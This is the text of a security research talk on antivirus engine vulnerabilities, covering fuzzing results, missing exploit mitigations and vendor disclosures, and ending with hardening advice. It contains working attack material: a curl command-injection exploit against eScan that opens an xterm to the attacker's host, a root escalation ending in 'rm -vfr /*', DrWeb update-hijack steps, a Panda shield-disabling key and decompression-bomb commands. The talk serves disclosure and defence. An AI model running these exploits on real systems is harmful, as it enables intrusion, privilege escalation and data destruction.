This document discusses attacking and exploiting antivirus software. It begins by describing how antivirus engines work and how their functionality can increase vulnerabilities. The document then details initial experiments fuzzing 14 antivirus engines, finding vulnerabilities like heap overflows and integer overflows. Specific vulnerabilities are listed for products like Avast, AVG, and BitDefender. Exploitation techniques are briefly covered, noting how antivirus engines can be exploited remotely similar to other applications due to issues like modules without ASLR. In-memory fuzzing is suggested as a way to more efficiently test for crashes.
3. Antivirus products
What is an Antivirus? Extracted from Wikipedia:
“An antivirus is a software used to prevent, detect
and remove malware such as computer viruses”.
AV software can be focused in offering end-
point protection (Workstation products) or file-
server protection (Server products such as mail
filters, SMB scanners, etc...).
Overall, the general aim of an Antivirus is to
offer a better level of protection than what the
underlying operating system offers alone.
And they often fail miserably...
4. Antivirus Engines
Common features of AV engines:
Written in C/C++.
Signatures based engine + heuristics.
On-access scanners.
Command line/GUI on-demand scanners.
Support for compressed file archives.
Support for packers.
Support for miscellaneous file formats.
Advanced common features:
Packet filters and firewalls.
Drivers to protect the product, anti-rootkits, etc...
Anti-exploiting toolkits.
5. Antivirus products, engines and bugs
An antivirus engine is just the core, the kernel, of an
antivirus product.
Some antivirus engines are used by multiple products.
For example, BitDefender is the most widely used antivirus
kernel. It's used by many products like G-Data, QiHoo 360,
eScan, F-Secure, etc...
Most “big” antivirus companies have their own engine but
not all. And some companies, like F-Secure, integrate 3rd
party engines in their products.
In general, during this talk I will refer to AV engines, to the
kernels, except when specified the word “product”.
Also, unless specified as fixed, all bugs shown during this
presentation are 0days.
6. Antivirus users
What the average user of an antivirus thinks
after installing his/her preferred AV engine:
“I'm safe because I use an antivirus product”.
What some paranoid users of antivirus products
thinks:
“I'm safe because I use various antivirus products”.
My opinion:
Any software you install makes you a bit more
vulnerable. AV engines are no exceptions. Just the
opposite.
...
7. Attack surface
Fact: installing an application in your computer makes
you a bit more vulnerable.
You just increased your attack surface.
If the application is local: your local attack surface
increased.
If the application is remote: your remote attack surface
increased.
If your application runs with the highest privileges,
installs kernel drivers, a packet filter and tries to
handle anything your computer may do...
Your attack surface dramatically increased.
8. Myths and reality
Antivirus propaganda:
“We make your computer safer with no
performance penalty!”
“We protect against unknown zero day attacks!”.
Reality:
AV engines makes your computer more vulnerable
with a varying degree of performance penalty.
The AV engine is as vulnerable to zero day attacks
as the applications it tries to protect from.
And can even lower the operating system
exploiting mitigations, by the way...
10. Attacking antivirus engines
AV engines, commonly, are written in non managed
languages due to performance reasons.
Almost all engines written in C and/or C++ with only a few
exceptions, like the old MalwareBytes, written in VB6 (!?).
It translates into buffer overflows, integer overflows, format
strings, etc...
Most AV engines installs operating system drivers.
It translates into possible local escalation of privileges.
AV engines must support a long list of file formats:
Rar, Zip, 7z, Xar, Tar, Cpio, Ole2, Pdf, Chm, Hlp, PE, Elf,
Mach-O, Jpg, Png, Bz, Gz, Lzma, Tga, Wmf, Ico, Cur...
It translates into bugs in the parsers of such file formats.
11. Attacking antivirus engines
AV engines need to support such large list of file
formats quickly and even better than the vendor.
If an exploit for a new file format appears, customer will
ask for support for such files as soon as possible. The
longer it takes, the higher the odds of losing a customer
moving on to another vendor.
The producer doesn't need to “support” malformed files.
The AV engine actually needs to do so.
The vendor needs to handle malformed files but only to refuse
them as repairing such files is an open door for vulnerabilities.
Example: Adobe Acrobat
12. Attacking antivirus engines
Most (if not all...) antivirus engines run with the highest
privileges: root or local system.
If one can find a bug and write an exploit for the AV engine,
(s)he just won root or system privileges.
Sandboxes, virtual machines, etc... are extremely rare.
Most antivirus engines updates via HTTP only protocols:
If one can MITM the connection (for example, in a LAN) one
can install new files and/or replace existing installation files.
It often translates in completely owning the machine with the
AV engine installed as updates are not commonly signed.
Yes. They aren't.
I will show later one of the many vulnerable products...
13. Attacking antivirus engines
AV engines often offer on-access scanners and behaviour
based heuristic engines.
Such scanners are usually implemented in 3 different ways:
A sandbox on top of the AV's Intel x86 emulator. Very slow but,
also, very little odds to attack such component.
A driver to monitor file creation/access as well as process
behaviour communicating with a user-level component. There is
space for a possible EoP.
Injecting libraries in all user-processes and hooking special
functions. The easiest way to implement heuristic engines.
Often, such “protection” methods make things worst than not having
an antivirus engine.
I'll show later on why with some real vulnerabilities...
15. Vulnerabilities in AV engines
Started around end of July/beginning of August to find
vulnerabilities, for fun, in AV engines.
In my spare time, some hours from time to time.
Found remote and local vulnerabilities in 14 AV
engines or AV products.
Most of them in the first 2 months.
I tested ~17 engines (I think, I honestly do not
remember).
It says it all.
I'll talk about some of the vulnerabilities I found.
The following are just a couple of them...
16. AV engines vulnerabilities
Avast: Heap overflow in RPM (reported, fixed and Bug Bounty paid)
Avg: Heap overflow with Cpio (fixed...)/Multiple vulnerabilities with packers
Avira: Multiple remote vulnerabilities
BitDefender: Multiple remote vulnerabilities
ClamAV:Infinite loop with a malformed PE (reported & fixed, patch available soon)
Comodo: Heap overflow with Chm
DrWeb: Multiple remote vulnerabilities
ESET: Integer overflow with PDF/Multiple vulnerabilities with packers
F-Prot: Heap overflows with multiple packers
F-Secure: Multiple remote vulnerabilities (contacted, amazingly collaborative)
Panda: Multiple local privilege escalations (reported and partially fixed)
eScan: Remote command injection
And many more...
17. Broken AV products...
The list is interminable... but, using this list
http://www.av-comparatives.org/av-vendors/
...anything using a 3rd party engine which is not
Vipre, Norman, Cyren or Agnitum.
Examples: QiHoo 360, F-Secure, G-Data, eScan,
Emsisoft, BullGuard, Immunet, etc...
+ all the AV products using the AV engines
mentioned in the previous slide.
+ some rare AV products like BkAV.
18. How to find such vulnerabilities?
I used initially a fuzzing testing suite of my own, Nightmare.
http://www.joxeankoret.com/download/Nightmare-0.0.2.tar.gz
I will eventually upload the code to GitHub.com
Downloaded all the AV engines with a Linux version I was able to
find.
The core is always the same with the only exception of some heuristic
engines.
Also used some (dirty) tricks to run Windows only AV engines in Linux.
Fuzzed the command line tool of each AV engine by simply using
radamsa + the testing suite of ClamAV, many different EXE packers
and some random file formats.
Results: Dozens of remotely exploitable vulnerabilities.
Also, I performed basic local and remote checks:
ASLR, null ACLs, updating protocol, network services, etc...
20. Fuzzing statistics
A friend of mine convinced me to write a fuzzer and do
a “Fuzzing explained” like talk for a private conference.
Really simple fuzzing engine with a max. of 10 nodes.
I'm poor... I cannot “start relatively small, with 300
boxes” like Google people does.
Used this fuzzing suite to fuzz various Linux based AV
engines, those I was able to run and debug.
For that talk I did fuzz/test the following ones:
BitDefender, Comodo, F-Prot, F-Secure, Avast,
ClamAV, AVG.
Results...
21. ClamAV
Only 1 non reproducible
crash :(
Ran for about 2 weeks.
Only 1 DOS (found manually)
1 infinite loop with a
malformed PE.
Asked to remain silent until
a public patch is published.
Honestly, I was very
surprised.
It seems they use fuzzing.
Well done guys!
22. F-Secure
No crash at all. Only found
1 memory exhaustion bug
with CPIO.
Consumes up to 4GB of
memory.
I was sure I was doing
something wrong and I
verified it later on...
Decided not to continue at
that moment because it
was too heavy and
required root for debug.
23. Avast
5 different bugs.
Some of them
disappeared quickly...
1 of them seemed to be
exploitable.
RPM Support. Bug
reported and fixed.
This is one of the AV engines
I fuzzed the most: ~1 month.
They have a Bug Bounty!
Only reason why I
contacted them.
24. Comodo AV
Only 5 crashes.
2 different bugs.
1 seems to be
exploitable.
Heap overflow with
CHM files when
uncompressing data...
IMHO, it didn't fail more
because they don't
support anything...
25. F-Prot
4 different bugs.
Only left for around 2/3
hours.
The bugs seems to be all
exploitables.
Armadillo, PECompact,
ASPack and Yoda's
Protector unpackers.
Crashes at memcpy
coming from different
paths...
26. AVG
Hundred of crashes, fuzzed
“manually” :(
It sends crash reports
automatically :/ I hate you.
It needs to be fed via
STDIN. Annoying.
4 different bugs found.
2 of them seem to be
exploitable.
CPIO and XAR files support.
1st one fixed recently :/
XAR one still 0day.
27. BitDefender
+1500 crashes.
7 different bugs.
Most of them with
EXE unpackers and
EXE uncompressors.
Thinstall and Shrinker,
for example.
2 of them seems to
be exploitable.
28. More about fuzzing AV engines
Most AV engines are Windows only.
However, we can still fuzz them in non Windows
based environments (Linux requires less memory and
disk).
What I have done:
Try to run it with Wine. If it works use WineDBG + GDB
server and connect IDA or GDB to the target.
If it doesn't work, reverse engineer the core engine and
write a more simple wrapper for it.
Very time consuming but the best option.
...
29. More about fuzzing AV engines
AV engines take a long while loading the core. They need to
load all the signatures, unpack/decrypt them in memory, etc...
The solution: use in-memory fuzzing.
Reverse engineer your favourite AV's core engine and find the
functions where files are being scanned.
Debug the target application with IDA and use the AppCall feature
to call those functions with your own input. For example.
You don't need to restart it again and again. Just wait for it to
crash while continuously feeding fuzzed inputs.
However, it may cause some false positives:
Some files/buffers can be discarded at some point before
that scanning routine.
31. Exploiting AV engines
What will be briefly covered:
Remote exploitation.
What will be not:
Local exploitation of local user-land or kernel-land
vulnerabilities.
I have no knowledge about kernel-land, sorry.
Later on, I will discuss some local vulnerability and
give details about how to exploit it but it isn't kernel
stuff and is too easy to exploit.
32. Exploiting AV engines
Exploiting an AV engine is like exploiting any
other client-side application.
Is not like exploiting a browser or a PDF reader.
Is more like exploiting an Office file format.
Exploiting memory corruptions in client-side
applications remotely can be quite hard
nowadays due to ASLR.
However, AV engines makes too many mistakes
too often so, don't worry ;)
...
33. Exploiting AV engines
In general, AV engines are all compiled with
ASLR enabled.
But it's common that only the core modules are
compiled with ASLR.
Not the GUI related programs and libraries, for
example.
Some libraries of the core of some AV engines
are not ASLR enabled.
Check your target/own product, there isn't only
one ;)
34. Exploiting AV engines
Even in “major” AV engines...
...there are non ASLR enabled modules.
...there are RWX pages at fixed addresses.
...they disable DEP.
Under certain conditions, of course.
The condition, often, is the emulator.
35. Exploiting AV engines
The x86 emulator is a key part of an AV engine.
It's used to unpack samples in memory, to
determine the behaviour of an executable
program, etc...
Various AV engines create RWX pages at fixed
addresses and disable DEP as long as the
emulator is used.
Very common. Does not apply to only some random
AV engine.
...
36. Exploiting AV engines (more tips)
By default, an AV engine will try to unpack
compressed files and scan the files inside.
A compressed archive file (zip, tgz, rar, ace,
etc...) can be created with several files inside.
The following is a common AV engines
exploitation scenario:
Send a compressed zip file.
The very first file inside forces the emulator to be
loaded and used.
The 2nd one is the real exploit.
37. Exploiting AV engines
AV engines implement multiple emulators.
There are emulators for x86, AMD64, ARM, JavaScript,
VBScript, …. in most of the “major” AV engines.
The emulators, as far as I can tell, cannot be used to
perform heap spraying, for example. But they expose a
considerable attack surface.
It's common to find memory leaks inside the emulators,
specially in the JavaScript engine.
They can be used to construct complex exploits as we have
a programming interface to craft inputs to the AV engine.
38. Exploiting AV engines: Summary
Exploiting AV engines is not different to exploiting other
client-side applications.
They don't have/offer any special self-protection. They rely
on the operating system features (ASLR/DEP) and nothing
else.
And sometimes they even disable such features.
There are programming interfaces for exploit writers:
The emulators: x86, AMD-64, ARM, JavaScript, ... usually.
Multiple files doing different actions each can be send in
one compressed file as long as the order inside it is kept.
Owning the AV engine means getting root or system in all
AV engines I tested. There is no need for a sandbox
escape, in general.
41. Disclaimer
I'm only showing a couple of my vulnerabilities.
I have the bad habit of eating 3 times a day...
I contacted 5 vendors for different reasons:
Avast. They offer a Bug Bounty. Well done guys!
ClamAV. Their antivirus is Open Source.
Panda. I have close friends there.
Ikarus, ESET and F-Secure. They contacted me an asked
for help nicely.
I do not “responsibly” contact multi-million dollar
companies.
I don't give my research for free.
Audit your products...
44. Example: Panda Multiple local EoPs
In the product Global Protection 2013 there are
various processes running as SYSTEM.
Two of those processes have a NULL process
ACL:
WebProxy.EXE and SrvLoad.EXE
We can use CreateRemoteThread to inject a
DLL, for example.
Two very easy local escalation of privileges.
But the processes are “protected” by the shield.
45. Example: Panda Multiple local EoPs
Another terrible bug: The Panda's installation
directory have write privileges for all users.
However, again, the directory is “protected” by
the shield...
What is the fucking shield?
...
46. Example: Panda Multiple local EoPs
The Panda shield is a driver that protects some
Panda owned processes, the program files
directory, etc...
It reads some registry keys to determine if the
shield is enabled or disabled.
But... the registry key is world writeable.
Also, it's funny, but there is a library
(pavshld.dll) with various exported functions...
...
47. Example: Panda Multiple local EoPs
All exported functions contains human readable names.
All but the 2 first functions. They are called PAVSHLD_001
and 002.
Decided to reverse engineer them for obvious reasons...
The 1st function is a backdoor to disable the shield.
It receives only 1 argument, a “secret key” (GUID):
ae217538-194a-4178-9a8f-2606b94d9f13
If the key is correct, then the corresponding registry keys
are written.
Well, is easier than writing yourself the registry entries...
48. MOAR PANDAZ
There are more stupid bugs in this AV engine...
For example, no library is compiled with ASLR
enabled.
One can write a reliable exploit for Panda
without any real big effort.
And, also, one can write an exploit targeting
Panda Global Protection users for any program.
Why? Because the product injects 3 libraries
without ASLR enabled in all processes. Yes.
49. Panda
I reported the vulnerabilities because I have
friends there.
Some of them are (supposedly) fixed, others
not...
The shield backdoor.
The permissions of the Panda installation directory.
The injection of non randomized libraries bug
that allows writing targeted exploits remains...
Also, during my latest testing of their very last
version, other local vulnerabilities appeared...
51. ASLR disabled
We already discussed that Panda Global
Protection doesn't enable ASLR for all modules.
Do you believe this is an isolated problem of
just one antivirus product?
As it is common with antivirus
products/engines, such problems are not
specific...
54. Forticlient
Most libraries and binaries in Forticlient doesn't
have ASLR enabled.
Exploiting Forticlient with so many non ASLR
enabled modules once a bug is found is trivial.
You may think that this is a problem that
doesn't happen to the “big” ones...
Think again.
56. Kaspersky
Libraries avzkrnl.dll and module vlns.kdl, a
vulnerability scanner (LOL), are not ASLR
enabled.
One can write a reliable exploit for Kaspersky
AV without any real effort.
57. BitDefender
It's kind of easier to write an exploit for BitDefender...
“Security service” my ass...
59. BKAV
BKAV is a Vietnamese antivirus product.
Gartner recognizes it as a “Cool vendor in
Emerging Markets”.
I recognize it as a “Cool antivirus for writing
targeted exploits”...
61. BKAV
And, like Panda, they inject a non ASLR
enabled library system wide, the Bkav “firewall”
engine...
...miserably failing at securing your computer.
65. Examples: ClamAV DOS
There is a bug in ClamAV scanning some resource
directory in PE files.
I have been asked to wait until there is a public patch.
It's fixed in their private repository but the patch is big
so it needs some proper testing.
Sorry, I cannot give all the details yet :(
Found via dumb ass fuzzing.
Reported. Because it's Open Source...
https://bugzilla.clamav.net/show_bug.cgi?id=10650
The vulnerability was nicely handled by the ClamAV
team (now Cisco).
67. Decompression bombs (multiple AVs)
Do you remember them? If I remember
correctly, the 1st discussion in Bugtraq about it
was in 2001.
A compressed file with many compressed files
inside or with really big files inside.
It can be considered a remote denial of service.
Do you think AV engines are not vulnerable any
more to such bugs with more than +10 years?
In this case, you're wrong.
Look to the following table....
68. Failing AVs
ZIP GZ BZ2 RAR 7Z
ESET X (***) X (***)
BitDefender X
Sophos X (*) X X X
Comodo X
AVG X
Ikarus X
Kaspersky X (**)
* Sophos finishes after ~30 seconds. In a “testing” machine with 16 logical CPUs and 32 GB
of RAM.
** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one.
*** In my latest testing, ESET finishes after 1 minute with each file in my “small testing
machine”.
69. Decompression bombs: How to
To create a simple decompression bomb in
Unix issue the following commands:
$ truncate -s 8589934592 dumb # 8GB
$ 7z/gzip/bzip2/rar/lcab/compress/xxx dumb
That's all. The result file is always less than 10
MB.
I couldn't believe that still nowadays antivirus
engines failed at this trivial “attack” when I
“discovered” this...
71. BitDefender engine
BitDefender is a Romanian antivirus engine.
Their AV core is the most widely distributed AV
engine in other AV products.
To name a few: F-Secure, G-Data, QiHoo 360,
eScan, LavaSoft, Immunet, ...
It suffers from a number of vulnerabilities like
almost all other AV engines/products out there.
Finding vulnerabilities in this engine is trivial.
An easy example...
72. BitDefender bugs
Modifying 2 DWORDs in a PE file packed with
Shrinker3 packer will make it to crash:
Those bytes are used to calculate the file and sections
alignment of the new, in memory, unpacked PE file.
When set to 0xFFFFFFFF and 0xFFFFFFF, both file
and sections alignment will be set to 0...
73. BitDefender bugs
...and their values will be used, later on, in
some arithmetic operations:
Those 2 bugs are trivial to discover.
74. BitDefender notes
This and all BitDefender's bugs don't affect
exclusively BitDefender's products.
It affects many AV products out there as
previously mentioned.
Adding a new AV engine to your product may
sound “cool” but you're making 3rd party bugs
yours.
And, by the way, you didn't audit it before
adding to your product...
Otherwise, I doubt you would have added it.
76. ESET Nod32
ESET Nod32 is a Slovak AV engine.
Like most AV engines it suffers from a
number of vulnerabilities that can be
trivially discovered.
One little example: a malformed PDF file.
A negative or big value for any element of
a /W(idth) element with arrays will make it to
crash.
A simple remote denial of service.
77. ESET Nod32 bug with PDF files
According to ESET sources they use fuzzing as
part of QA.
I think they are not doing it very well...
Finding this bug is trivial, like all the ones I
previously shown.
79. F-Secure
F-Secure is an antivirus from Finnland.
They use 2 AV engines: their own one and the
BitDefender's one.
So, the previous bug, the BitDefender's one, also
affects this AV product.
Like with the whole majority of AV engines out there,
there are rather easy to discover bugs in their (own)
engine.
Let's see a simple vulnerability they fixed in February.
80. F-Secure bug with InnoSetup
There was a little bug handling some InnoSetup
installers. Bug is at InnoDecoder::IsInnoNew().
A size for a call to FMalloc can be controlled:
81. F-Secure bug with InnoSetup
A negative size will make malloc to fail but it will
anyway memset the buffer...
Basically, memset(NULL, '0', negative_size).
Another bug trivial to discover by any means.
82. Proof of concepts
Proof of concepts for the last discussed bugs
can be downloaded from here:
http://www.joxeankoret.com/download/3ea0506f0e583c
Shortened URL:
http://x90.es/7Lm
85. DrWeb antivirus
DrWeb is a Russian antivirus. Used, for example, by the
largest bank (Sberbank) and the largest search engine in
Russia (Yandex) + the Duma, to name a few customers.
More of their propaganda:
86. DrWeb updating protocol
DrWeb updates via HTTP only. They do not
use SSL/TLS.
It downloads a catalog file first:
Example for Linux:
http://<server>/unix/700/drweb32.lst.lzma
In the catalog file there is a number of updatable
files + a hash for them:
VDB files (Virus DataBases).
DrWeb32.dll.
The hash is, actually, CRC32 and no component is
signed, even the DrWeb32.dll library.
87. DrWeb updating protocol
The “highest grade of certificate” requires the highest grade of
check for their database files and libraries: CRC32. “High
standards”.
To exploit in a LAN intercept the following domains:
update.nsk1.drweb.com
update.drweb.com
update.msk.drweb.com
update.us.drweb.com
update.msk5.drweb.com
update.msk6.drweb.com
update.fr1.drweb.com
update.us1.drweb.com
update.nsk1.drweb.com
...and replace drweb32.dll with your “modified” (lzma'ed) version.
88. DrWeb updating protocol
Exploiting it is rather easy with ettercap and a
quick Python web server + Unix lzma tool.
You only need to calculate the CRC32 checksum
and compress (lzma) the drweb32.dll file.
I tested the bug under Linux: full code
execution is possible.
Though you need to be in a LAN to be able to do
so, obviously.
In my opinion, this updating protocol is horrible.
91. eScan for Linux
eScan is an AV product from USA (MicroWorld Technologies).
I was bored some random night in Singapore and found that the
eScan product have a Linux version.
I downloaded and installed it (~1 hour because of the awful
hotel's connection).
Then I started checking what it installs, finding for SUID
binaries, etc...
They use BitDefender and ClamAV engines, they don't have their
own engine so, no need to test the scanners.
I already had vulnerabilities for such engines...
They install a Web server for management and a SUID binary
called:
/opt/MicroWorld/sbin/runasroot
92. eScan for Linux
The SUID binary allows to execute root
commands to the following users:
root
mwconf (created during installation).
The eScan management application (called
MwAdmin) is so flawed I decided to stop at the
first RCE...
A command injection in the login form (PHP).
In a “security” product.
Yes.
94. eScan for Linux remote root
This specific bug requires to know/guess an
existing user. Not so hard.
The user name and the password are used to
construct an operating system command
executed via the PHP's function “exec”.
I was not able to inject in the user name.
But I was able to inject in the password.
...
96. Source code of login.php (II)
The password sent by the user is passed to check_user:
There are some very basic checks against the
password.
Specially for shell escape characters.
But they forgot various other characters like ';'.
97. Source code of common_functions.php
Then, the given password is used in the
function check_user like this:
98. eScan for Linux RCE
My super-ultra-very-txupi-complex exploit for it:
$ xhost +
$ curl –data
"product=1&[email protected]&pass=1234567;
DISPLAY=YOURIP:0;xterm;"
http://target:10080/login.php
Once you're in, run this to escalate privileges:
$ /opt/MicroWorld/sbin/runasroot
/usr/bin/xterm
Or anything else you want...
$ /opt/MicroWorld/sbin/runasroot rm -vfr /*
100. Conclusions
In general, AV software...
...doesn't make you any safer against skilled attackers.
...increase your attack surface.
...make you more vulnerable to skilled attackers.
...are as vulnerable to attacks as any other application.
Some AV software...
...may lower your operating system protections.
...are plagued of both local and remote vulnerabilities.
Some AV companies...
...don't give a fuck about security in their products.
102. Recommendations for AV users
Do not blindly trust your AV product.
BTW, do not trust your AV product.
Also, do not trust your AV product.
Nope. I cannot stress it enough.
Isolate the machines with AV engines used for
gateways, network inspection, etc...
Audit your AV engine or ask a 3rd party to audit
the AV engine you want to deploy in your
organization.
103. Recommendations for AV companies
Audit your products: source code reviews & fuzzing.
No, AV comparatives and the like are not even remotely
close to this.
Running a Bug Bounty, like Avast, is a very good idea too.
Do not use the highest privileges possible for scanning
network packets, files, etc...
You don't need to be root/system to scan a network packet
or a file.
You only need root/system to get the contents of that packet
or file.
Send the network packet or file contents to another, low
privileged or sandboxed, process.
104. Recommendations for AV companies
Run dangerous code under an emulator, vm or, at the very
least, in a sandbox. I only know 2 AVs using this approach.
Dangerous code: file parsers written in C/C++ code.
If one finds a vulnerability and it's running inside an
emulator/sandbox one needs also an escape vulnerability to
completely own the AV engine.
Why is it harder to exploit browsers or document
readers than security products?
Another option could be to use a “safer” language. Some AV
products, actually, are doing this: Using Lua, for example.
Do not trust your own processes. They can be owned.
I'm not talking about signing the files.
I'm talking about your AV's running processes.
105. Recommendations for AV companies
Do not use plain HTTP for updating your
product.
Use SSL/TLS.
Also, digitally sign all files.
No, CRC is not a signature. Really.
...and verify there is nothing else after the signature.
106. Recommendations for AV companies
Drop old code that is of no use today or make this
code not available by default.
Code for MS-DOS era viruses, packers, protectors,
etc...
Parsers for file format vulnerabilities in completely
unsupported products nowadays.
Such old code not touched in years is likely to have
vulnerabilities.
This is up to you: what do you prefer? Fail at stupid AV
comparatives (AV-Test, anyone?) not detecting
viruses from the Jurassic or have a more secure
product?